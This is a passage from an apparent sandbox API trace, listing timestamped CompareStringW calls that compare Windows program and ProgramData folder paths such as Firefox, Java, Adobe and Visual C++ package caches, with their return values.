lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=114) returned 1 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=51) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount1=47, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=51) returned 1 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount2=51) returned 1 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount2=43) returned 1 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount2=43) returned 1 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount2=43) returned 1 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount2=43) returned 1 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\gmp-clearkey\\0.1\\", cchCount2=56) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\gmp-clearkey\\0.1\\", cchCount2=56) returned 1 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\gmp-clearkey\\0.1\\", cchCount2=56) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 3 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.280] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\gmp-clearkey\\0.1\\", cchCount1=56, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\", cchCount2=45) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\gmp-clearkey\\0.1\\", cchCount1=56, lpString2="C:\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\", cchCount2=45) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\", cchCount2=45) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\", cchCount2=45) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 2 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount2=68) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount2=68) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount2=68) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount2=68) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\", cchCount1=45, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount2=109) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount2=112) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount2=39) returned 2 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount2=68) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount2=68) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount2=68) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount2=68) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=111) returned 3 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount1=68, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount1=68, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 2 [0259.281] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount2=51) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\", cchCount1=43, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount2=51) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\", cchCount1=47, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount2=51) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\gmp-clearkey\\0.1\\", cchCount1=56, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount2=51) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount2=51) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount2=36) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount2=36) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Adobe\\ARM\\Reader_17.012.20098\\", cchCount1=45, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount2=36) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount2=36) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=112) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=112) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{A2563E55-3BEC-3828-8D67-E5E8B9E8B675}v14.0.23026\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=112) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=114, lpString2="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\", cchCount2=112) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=114) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\", cchCount1=39, lpString2="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=114) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath\\", cchCount1=36, lpString2="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=114) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Oracle\\Java\\javapath_target_5923062\\", cchCount1=51, lpString2="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=114) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchCount1=109, lpString2="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=114) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=115) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=115) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=115) returned 3 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", cchCount1=68, lpString2="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=115) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\", cchCount1=111, lpString2="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount2=115) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\", cchCount1=68, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{BE960C1C-7BAD-3DE6-8B1A-2616FE532845}v14.0.23026\\packages\\vcRuntimeAdditional_x86\\", cchCount1=112, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", cchCount1=115, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 1 [0259.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\regid.1991-06.com.microsoft\\", cchCount1=43, 